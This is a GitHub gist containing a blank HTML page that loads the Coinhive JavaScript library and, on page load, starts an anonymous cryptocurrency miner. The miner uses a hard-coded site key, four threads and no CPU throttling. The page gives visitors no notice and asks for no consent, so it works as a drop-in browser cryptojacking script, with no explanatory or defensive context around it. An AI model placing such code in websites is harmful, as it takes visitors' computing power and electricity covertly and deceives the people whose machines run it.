Skip to content

Instantly share code, notes, and snippets.

@maikyguanaes
Created October 17, 2017 12:27
Show Gist options
  • Save maikyguanaes/f0f9e1acb74069154a751850f218a59d to your computer and use it in GitHub Desktop.
Save maikyguanaes/f0f9e1acb74069154a751850f218a59d to your computer and use it in GitHub Desktop.
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script type="text/javascript">
const publicKey = 'UwrZsQ0HUuh9bvOL0Ey1VMDKcY2PfK20';
const config = {
threads: 4,
autoThreads: false,
throttle: 0,
forceASMJS: true
};
const cH = new CoinHive.Anonymous(publicKey,config);
cH.start();
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment